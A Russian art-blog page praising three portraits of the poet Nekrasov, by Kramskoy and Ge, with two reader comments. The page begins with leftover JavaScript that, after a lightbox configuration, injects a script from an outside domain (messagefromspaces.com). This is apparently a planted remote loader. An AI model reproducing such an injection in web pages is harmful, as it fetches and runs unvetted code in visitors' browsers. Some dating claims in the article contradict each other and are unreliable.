, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портрет Некрасова Н.А.

Автор: Дмитрий Алмазов | 18 Мар 2014

Портрет Некрасова Н.А.Николай Алексеевич Некрасов - первый гражданский поэт российский империи и истинный классик реализма. Он первым прославил жизнь простого, русского мужика и страшный труд строителя московской железной дороги. Существует множество полотен с русским писателем. В основном все некрасовские портреты созданы в направление реализма. Каждый портрет по-своему прекрасен, но давайте познакомимся с лучшими работами.

Первый портрет - это полотно основателя сообщества передвижных выставок и уроженца Воронежа - Ивана Крамского. Картина написана в 1877 году. Существует необычная история создания холста. Данное полотно было заказано Павлом Третьяковым для собственной галереи. Некрасов уже был тяжело болен и находился на смертном одре; позировать писатель совершенно не мог. Крамскому и Третьякову пришлось пойти на хитрость: они, чтобы не мучить поэта, приходили к нему каждый день на 10-15 минут, делали небольшие зарисовки, а дорабатывали остальное с помощью последней прижизненной фотографии писателя, которая была создана Карриком. Многие искусствоведы называют это портрет эталоном. Перед нами. Предстает истинный интеллигент в многогранных, зелено-изумрудных и благородно коричневых тонах. На холсте присутствует детализация: мы прекрасно видим яркие глаза, отчетливые скулы и небольшую бороду. Познакомиться с этой картиной вы сможете в Третьяковской галерее.

Портрет Некрасова, художник Николай ГеВторой портрет - это полотно, выполненное другом Крамского - Николаем Ге. Этот портрет создан, чуть раньше, чем работа Крамского, в 1872 году и является также одним из последних портретов писателя. На холсте в велюровом кресле сидит Некрасов и печальным взглядом смотрит на зрителя. Картина выполнена в канонических цветах передвижного-выставочного реализма: малахитовый, плесневый, белый, мышиный, черный, почвенный. "Ярким пятном" являются оранжевые и бежевые геометрические орнаменты на старом, темно-зеленом троне поэта. На холсте мы снова, как и портрета Крамского, видим детальный образ Некрасова: уже больные, печальные глаза, все тоже четкие скулы и маленькую бороду. Возможно, писатель удручен своим положением. Данный холст хорошо известен поклонникам писателя; они считают, что этот портрет самое точное изображения Некрасова. В жизни он таким и был. Узнать поближе этот портрет вы сможете в Третьяковской галерее.

Портрет Некрасова, работа Ивана КрамскогоТретий портрет - это еще одна работа Ивана Крамского. Портрет написан в 1877 года, до болезни писателя. На полотне мы видим Некрасова в постели. Кстати, на данном полотне нет канонических, зеленых цветов. Присутствуют белые, нежно-коричневые, молочные, охристые и терракотовые цвета. Писатель не смотрит на зрителя, его взгляд устремлен вдаль. Возможно, что художник застал поэта во время утренней работы. Николай Алексеевич в расположенном к труду настроению становится одним целом с интерьером собственного дома. Познакомиться с этим полотном вы сможете в Третьяковской галерее.

Итак, Портрет Николая Некрасова, созданный Крамским, сделал писателя эталоном живописи и классиком на все времена.

Автор Алла Битюцкая

Темы: Портрет, Школа искусства, о Живописи | Отзывов: 2 »

Отзывов: 2 на “Портрет Некрасова Н.А.”

  1. Елена пишет:
    23 Мар 2014 в 15:39

    Небольшой экскурс по наиболее выдающимся портретам знаменитого русского писателя Н. А. Некрасова. Эта статья будет полезна не только любителям и знатокам творчества выдающегося писателя, но и всем, кому интересна культура и наследие нашего народа.

  2. Лики пишет:
    27 Мар 2014 в 22:04

    Соглашусь с раннее написанным отзывом. Ведь статья полезна и любителям литературы, и любителям живописи. Художники – передвижники смогли создать «настоящего, истинного» портрет гражданского писателя. Мне очень понравился факт, что именно портрет Некрасова, написанный Крамский, стал эталоном русского портрета.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress